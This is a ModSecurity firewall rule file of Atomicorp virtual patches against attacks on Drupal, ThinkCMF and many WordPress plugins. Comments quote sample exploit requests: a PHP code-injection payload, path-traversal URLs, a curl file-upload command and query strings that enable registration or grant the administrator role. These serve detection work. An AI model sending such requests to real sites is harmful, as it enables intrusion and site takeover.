SecRule REQUEST_FILENAME "(?:index\.php|\/$)" "chain,capture,phase:2,deny,log,auditlog,id:390755,rev:2,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drupal Code Injection attack blocked',logdata:'%{TX.0}'"
SecRule REQUEST_METHOD "^(?:GET|POST|HEAD)$" "chain,t:none"
SecRule ARGS_NAMES|REQUEST_COOKIES_NAMES "(?:^\#(?:submit|validate|p(?:re_render|ost_render|rocess)|element_validate|after_build|(?:value|access)_callback$)|\[(?:\'|\")?#(?:submit|validate|p(?:re_render|ost_render|rocess)|element_validate|after_build|value_callback))" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,t:removenulls,t:removeWhiteSpace"
#moved from encrypted embargoed rules
SecRule REQUEST_URI "/\?q=" "chain,capture,phase:2,deny,log,auditlog,id:390766,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drupal Code Injection attack blocked',logdata:'%{TX.0}'"
SecRule REQUEST_METHOD "^(?:GET|POST|HEAD)$" "chain,t:none"
SecRule ARGS|ARGS_NAMES "\[\%2523" "t:none,t:removeWhiteSpace"
#moved from encrypted embargoed rules
SecRule REQUEST_URI "/\?q=file/ajax/actions/cancel/#options" "chain,capture,phase:2,deny,log,auditlog,id:390767,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drupal Code Injection attack blocked',logdata:'%{TX.0}'"
SecRule REQUEST_METHOD "^(?:GET|POST|HEAD)$" "t:none"
#/?a=fetch&content=%3Cphp%3Edie(@md5(HelloThinkCMF))%3C/php%3E
SecRule ARGS:a "^fetch$" "chain,capture,phase:2,deny,log,auditlog,id:390768,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Code Injection attack blocked',logdata:'%{TX.0}'"
SecRule ARGS:content "php" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"
#PHP applications
SecRule REQUEST_FILENAME "\.ph(?:p|tml|t)" "id:333865,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309000,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP"
SecRule REQUEST_METHOD "!(POST|GET|HEAD)" "phase:2,id:309200,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP"
SecRule ARGS:action "plugins/myeasybackup/meb_download\.php" "chain,phase:2,deny,log,auditlog,id:322211,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP myEasybackup directory recursion attack ',severity:2"
SecRule ARGS:dwn_file "\.\./" "t:none,t:urlDecodeUni,t:normalizePath"
SecRule REQUEST_URI "/util/php/eval-stdin\.php" "phase:2,deny,log,auditlog,id:393782,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PGP eval stdin attack blocked',severity:2"
SecRule REQUEST_URI "connector\.minimal\.php" "phase:2,deny,log,auditlog,id:393781,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress File Manager Plugin attack blocked',severity:2"
SecRule REQUEST_FILENAME "wp-json/wp_live_chat_support/v1/remote_upload" "chain,phase:2,id:322121,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP Live Chat File Upload attack',severity:2"
SecRule &ARGS_POST:cid "@ge 1" "chain,t:none"
SecRule FILES "\.(?:(?:p|s|x|d)?h(?:p[2-7s]?|(?:tmp?)?l?)|dll|exe|js|p(?:l|y)|rb|sh|cgi|com|bat|aspx?)" "t:none,t:urlDecodeUni,t:lowercase"
#tccj-update=update
#tccj-content javascript
SecRule ARGS:tccj-update "update" "chain,phase:2,deny,log,auditlog,id:393780,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Possible TC custom javscript injection attack blocked',severity:2"
SecRule ARGS:tccj-content "script" "t:none,t:urlDecodeUni,t:lowercase"
SecRule REQUEST_URI "wp-admin/profile\.php" "chain,id:334616,phase:2,t:none,deny,auditlog,log,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Advanced Access Manager attack attempt',rev:1,severity:2"
SecRule &ARGS:/aam_user_roles/ "@eq 1" "t:none"
#WP User Avatar plugin privilege escalation attack attempt
SecRule REQUEST_METHOD "POST" "chain,id:334617,phase:2,t:none,deny,auditlog,log,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP User Avatar plugin privilege escalation attack attempt',rev:1,severity:2"
SecRule REQUEST_URI "/wp-admin/profile\.php" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:action "update" "t:none,t:lowercase,chain"
SecRule ARGS "administrator" "t:none,t:lowercase,chain"
SecRule &ARGS:/^members_user_roles\[\]/ "@eq 0" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule &ARGS:houzez_role "@eq 0" "t:none,t:lowercase,chain"
SecRule REQUEST_COOKIES_NAMES "!@contains wordpress_sec" "t:none"
#/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
SecRule REQUEST_URI "jax_async?_link" "chain,phase:2,deny,log,auditlog,id:393750,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress ajax_asyn_link LFI attack blocked',severity:2"
SecRule ARGS:url "(?:\.\.\/|^/(?:etc|root|var|opt)/)" "t:none,t:urlDecodeUni,t:cmdline"
SecRule REQUEST_URI "wp-admin/tools\.php" "chain,phase:2,deny,log,auditlog,id:393758,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress backup manager LFI attack blocked',severity:2"
SecRule ARGS:page "backup_manager" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:download_backup_file "\.\./" "t:none,t:urlDecodeUni,t:cmdline"
SecRule REQUEST_URI "wp-content/plugins/db-backup/download\.php" "chain,phase:2,deny,log,auditlog,id:393759,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress backup manager LFI attack blocked',severity:2"
SecRule ARGS:file "(?:\.\.\/|^/(?:etc|root|var|opt)/)" "t:none,t:urlDecodeUni,t:cmdline"
SecRule REQUEST_URI "ajax_shortcode_pattern\.php" "chain,phase:2,deny,log,auditlog,id:393771,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress shortcode LFI attack blocked',severity:2"
SecRule ARGS:ajax_path "(?:\.\.\/|^/(?:etc|root|var|opt)/)" "t:none,t:urlDecodeUni,t:cmdline"
SecRule REQUEST_URI "adaptive-images-script\.php" "chain,phase:2,deny,log,auditlog,id:393772,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress adaptive-images-script.php LFI attack blocked',severity:2"
SecRule ARGS:ajax_path "(?:\.\.\/|^/(?:etc|root|var|opt)/)" "t:none,t:urlDecodeUni,t:cmdline"
SecRule REQUEST_URI "/opac/search_rss\.php" "chain,phase:2,deny,log,auditlog,id:393760,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: OPAC RSS Search SQL injection attack blocked',severity:2"
SecRule ARGS:location "(?:\bselect\b|\bchr\()" "t:none,t:urlDecodeUni,t:removecomments,t:removeWhiteSpace,t:lowercase"
#/html2canvasproxy.php?url=http://google.com
SecRule REQUEST_URI "html2canvasproxy\.php" "chain,phase:2,deny,log,auditlog,id:393749,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress html2canvas proxy SSRF attack blocked',severity:2"
SecRule ARGS:url "^http" "t:none,t:urlDecodeUni,t:lowercase"
#WP admin.php vulnerabilities
SecRule REQUEST_FILENAME "wp-admin/admin\.php" "id:322199,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:322198,t:none,pass,nolog,noauditlog,skipAfter:END_WP_PHP_ADMIN"
SecRule ARGS:page "wpfm-admin" "chain,phase:2,id:322314,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP AccessPress Themes attack (CVE-2020-25378)',severity:2"
SecRule ARGS:id "\"" "t:none,t:UrlDecodeUni"
SecRule ARGS:page "recall-add" "chain,phase:2,id:322313,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP recall products plugin XSS attack (CVE-2020-25380)',severity:2"
SecRule ARGS:/recall/ "<(?:javascript|script|about|applet|activex|chrome)" "t:none,t:UrlDecodeUni,t:removewhitespace,t:lowercase"
SecRule ARGS:repeater "'" "chain,phase:2,id:322111,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Load More SQL injection attack',severity:2"
SecRule ARGS:page "ajax-load-more-repeaters" "t:none,t:urlDecodeUni,t:lowercase"
SecRule ARGS:page "mediafromftp-search-register" "chain,phase:2,id:322122,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP Medoa Recursion attack',severity:2"
SecRule ARGS_POST:searchdir "\.\./\.\." "t:none,t:urlDecodeUni,t:normalizePath"
SecMarker END_WP_PHP_ADMIN
SecRule REQUEST_FILENAME "wp-login\.php" "id:314895,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:314896,t:none,pass,nolog,noauditlog,skipAfter:END_WP_LOGIN"
#Possible WP brute force login attempt
SecRule REQUEST_METHOD "@streq POST" "chain,id:393666,phase:2,t:none,pass,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Wordpress brute force attempt, direct Login Missing Referer (not blocked)',rev:4,severity:4,tag:'no_ar'"
SecRule REQUEST_FILENAME "/wp-login\.php" "chain,t:none,t:lowercase,t:urlDecodeUni"
SecRule &REQUEST_HEADERS:Referer "@eq 0" "t:none,chain"
SecRule RESPONSE_STATUS "200"
SecRule ARGS:log "!@rx ^$" "chain,id:323667,phase:2,t:none,pass,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP XSS in Loginizer attack (CVE-2018-11366)',severity:2"
SecRule ARGS:pwd "!@rx ^$" "chain,t:none"
SecRule ARGS "<(?:javascript|script|about|applet|activex|chrome)" "t:none,t:htmlEntityDecode,t:removewhitespace,t:lowercase"
SecMarker END_WP_LOGIN
#admin-ajax vulnerabilities
SecRule REQUEST_FILENAME "admin-(?:ajax|post)\.php" "id:334895,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:373421,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_ADMIN_AJAX"
SecRule REQUEST_METHOD "POST" "id:356710,rev:1,phase:2,t:none,chain,status:403,deny,log,auditlog,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress PHP Anywhere < 3.0.0 - Remote Code Execution',severity:2"
SecRule ARGS:action "parse-media-shortcode" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:shortcode "\[php_everywhere\]" "t:none,t:urlDecodeUni,t:lowercase"
SecRule ARGS:wcuf_current_upload_session_id "(?:\.\./\.\.|ph(?:p|tml|t))" "phase:2,id:322182,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WooCommerce Unauthenticated Arbitrary File Upload attack',severity:2"
#phphp
SecRule ARGS:wcuf_file_name "ph(?:p|tml|t)" "phase:2,id:322183,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WooCommerce Unauthenticated Arbitrary File Upload attack',severity:2"
SecRule ARGS:action "gdlr_lms_cancel_booking" "phase:2,id:322102,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SQL Injection attack against WP Good Layers Plugin (CVE-2020-27481)',severity:2,tag:'SQLi'"
SecRule ARGS:file[title] "(?:<|(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "phase:2,id:322172,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Download Manager XSS attack (CVE-2013-7319)',severity:2"
SecRule ARGS:action "elementor_ajax" "chain,phase:2,id:322112,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Elementor Pro File Upload attack attack',severity:2"
SecRule REQUEST_HEADERS:Referer "post-new\.php\?post_type=elementor_icons" "t:none,t:urlDecodeUni,t:htmlEntityDecode,chain"
SecRule REQUEST_BODY "pro_assets_manager_custom_icon_upload\x22:\{\x22action\x22:\x22pro_assets_manager_custom_icon_upload\x22" "chain,t:none,t:urlDecode,t:htmlEntityDecode,t:compressWhitespace"
SecRule FILES "\.(zip|php\d?|p?html)$" "t:none,t:urlDecodeUni,t:lowercase"
SecRule ARGS:action "dnd_codedropz_upload" "chain,phase:2,id:322113,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drag and Drop Upload Contact Form Code Injection attack',severity:2"
SecRule &ARGS:upload-file "@ge 1" "chain,t:none"
SecRule ARGS:supported_type|ARGS:filename "%" "t:none,t:urlDecodeUni"
SecRule ARGS:action "import_widget_data" "chain,phase:2,id:322114,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP Widget Importer/Export RFI attack',severity:2"
SecRule ARGS:name "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)://" "t:none,t:urlDecodeUni,t:lowercase"
SecRule ARGS:action "mapp_tpl_" "chain,phase:2,id:322115,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MapPress Maps path recursion attack',severity:2"
SecRule ARGS:name "\.\./\.\." "t:none,t:urlDecodeUni,t:normalizePath"
#action=tnpc_render,b=html
SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:383709,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: KingComposer XSS attack blocked',severity:2"
SecRule ARGS:action "kc_install_online_preset" "t:none,t:urlDecodeUni,t:lowercase"
SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:322222,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP CommentLuv XSS attack blocked',severity:2"
SecRule ARGS:_ajax_nonce "(?:<|(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:303669,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Adning PHP code injection attack blocked',severity:2"
SecRule ARGS:action "_ning_upload_image" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:allowed_file_types "(?:php|zip)" "t:none,t:urlDecodeUni,t:lowercase"
SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:303668,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Adning PHP code injection attack blocked',severity:2"
SecRule ARGS:action "_ning_remove_image" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:uid "\.\./\.\./\.\." "t:none,t:urlDecodeUni,t:cmdline"
#action=tnpc_render,b=html
SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:303768,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Newsletter Plugin attack blocked',severity:2"
SecRule ARGS:action "tnpc_render" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:b "html" "t:none,t:urlDecodeUni,t:lowercase"
#action=tnpc_render,b=html
SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:303769,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Newsletter Plugin PHP objection insertion attack blocked',severity:2"
SecRule ARGS:action "tnpc_render" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:options[inline_edits] "(<|php|\{)" "t:none,t:urlDecodeUni,t:lowercase"
#/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:393767,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Arbitrary File Upload Vulnerability in Jssor Slider attack blocked',severity:2"
SecRule ARGS:param "upload_slide" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:param "upload_library" "t:none,t:urlDecodeUni,t:lowercase"
#Added if users disable generic wp-config file download protection rules
SecRule ARGS:action "duplicator_download" "chain,phase:2,deny,log,auditlog,id:323769,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: wp-config file download attack via duplicator plugin blocked',severity:2"
SecRule ARGS:file "(?:wp-config|\../\..)" "t:none,t:urlDecodeUni,t:lowercase"
#Release granted from encrypted embargo rules 3/4/20
SecRule ARGS:action "sent_gift_certificate" "phase:2,deny,log,auditlog,id:383769,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WooCommerce attack blocked',severity:2"
#/wp-admin/admin-ajax.php?action=subscribe_email&cs_email=1@1
SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:393769,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress ajaxServersettingschk command injection attack blocked',severity:2"
SecRule ARGS:cs_email "1@1" "t:none,t:urlDecodeUni"
SecRule REQUEST_URI "admin-ajax\.php" "chain,phase:2,deny,log,auditlog,id:393768,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress ajaxServersettingschk command injection attack blocked',severity:2"
SecRule ARGS:rootuname ";" "t:none,t:urlDecodeUni"
SecRule ARGS:page "^301bulkoptions$" "phase:2,deny,log,auditlog,id:393751,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress 301bulkoptions attack blocked',severity:2"
Secrule REQUEST_URI "admin-ajax\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347147,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Wordpress admin-ajax XSS attack',logdata:'%{TX.0}'"
SecRule ARGS:domain "(?:<|>)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:replaceComments,t:removeNulls,t:removewhitespace,t:lowercase"
Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347148,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Wordpress admin-ajax Live Chat plugin XSS attack',logdata:'%{TX.0}'"
SecRule ARGS:wplc_custom_js "(?:<|script|>)" "t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:replaceComments,t:removewhitespace,t:lowercase"
#$ curl https://VICTIM.COM/wp-admin/admin-ajax.php -F 'action=swpsmtp_clear_log' -F 'swpsmtp_import_settings=1' -F 'swpsmtp_import_settings_file=@/tmp/upload.txt'
SecRule ARGS:action "swpsmtp_clear_log" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347149,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Wordpress admin-ajax file injection attack',logdata:'%{TX.0}'"
SecRule ARGS:swpsmtp_import_settings "1" "chain,t:none,t:utf8toUnicode,t:urlDecodeUni"
SecRule &ARGS:swpsmtp_import_settings_file "!^0$" "t:none"
#class-donor-table.php
#Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347148,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Wordpress admin-ajax Live Chat plugin XSS attack',logdata:'%{TX.0}'"
#SecRule ARGS:wplc_custom_js "(?:<|script|>)" "t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:replaceComments,t:removewhitespace,t:lowercase"
#action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse%2C%22option%22%3A%22users_can_register%22%2C%22value%22+%3A%221%22%7D&security=
Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347150,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: WordPress GDPR Compliance Plugin Exploit blocked',logdata:'%{TX.0}'"
SecRule ARGS:action "wpgdprc_process_action" "t:none,t:lowercase,chain"
SecRule ARGS:data "(?:administrator|users_can_register|https?)" "t:none,t:lowercase"
#action=kiwi_social_share_set_option&args%5Bgroup%5D=users_can_register&args%5Bvalue%5D=1
Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347151,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Kiwi Social Plugin Exploit blocked',logdata:'%{TX.0}'"
SecRule ARGS:action "kiwi_social_share_set_option" "t:none,t:lowercase,chain"
SecRule ARGS "(?:administrator|users_can_register)" "t:none,t:lowercase"
#action=td_ajax_update_panel&wp_option%5Busers_can_register%5D=1
Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347152,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Kiwi Social Plugin Exploit blocked',logdata:'%{TX.0}'"
SecRule ARGS:action "td_ajax_update_panel" "t:none,t:lowercase,chain"
SecRule ARGS:/wp_option/ "(?:administrator|users_can_register|https?)" "t:none,t:lowercase"
#action=td_mod_register&email=master%40createsimpledomain.icu&user=mastericuuu
Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347153,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Kiwi Social Plugin Exploit blocked',logdata:'%{TX.0}'"
SecRule ARGS:action "td_mod_register" "t:none,t:lowercase"
#action=cp_add_subscriber&cp_set_user=administrator&message=hello&param%5Bemail%5D=master%40createsimpledomain.icu
#action=cp_add_subscriber&cp_set_user=administrator&cp_set_user=administrator&message=hello&message=letitbe&param%5Bemail%5D=master%40createsimpledomain.icu&param%5Bemail%5D=master%40createsimpledomain.icu
#action=cp_add_subscriber&cp_set_user=administrator&message=hello&param%5Bemail%5D=master%40createsimpledomain.icu
#action=cp_add_subscriber&cp_set_user=administrator&cp_set_user=administrator&message=hello&message=letitbe&param%5Bemail%5D=master%40createsimpledomain.icu&param%5Bemail%5D=master%40createsimpledomain.icu
Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347154,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Kiwi Social Plugin Exploit blocked',logdata:'%{TX.0}'"
SecRule ARGS:cp_add_subscriber "td_ajax_update_panel" "t:none,t:lowercase,chain"
SecRule ARGS:cp_set_user "administrator" "t:none,t:lowercase"
Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347155,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'"
SecRule ARGS:wplc_custom_js "fromcharcode" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"
Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347156,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'"
SecRule ARGS:action|ARGS:otw_pctl_action "(?:ewd_ufaq_updateoptions|gen_save_cssfixfront|manage_otw_pctl_options|savegooglecode)" "t:none,t:lowercase,chain"
SecRule ARGS:/custom_css/|ARGS:home "fromcharcode" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"
Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347157,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'"
SecRule ARGS:action "thim_update_theme_mods" "t:none,t:lowercase,chain"
SecRule ARGS:thim_value "(?:https?|fromcharcode|script)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"
#/wp-admin/admin-post.php?yp_remote_get
#yp_json_import_data=%5B%7B%22home%22%3A%22aHR0cHM6Ly9kZXN0cm95Zm9ybWUuY29tL3Q%2FdD0xJg%3D%3D%22%7D%5D
Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347158,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'"
SecRule ARGS:yp_json_import_data "(?:home|siteurl|http)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:yp_remote_get "[0-9a-z]" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"
Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347159,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'"
SecRule ARGS:CP_ABC_post_edition "1" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:editionarea "(?:https?|fromcharcode|script)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"
#/wp-admin/admin-ajax.php?action=wcp_change_post_width
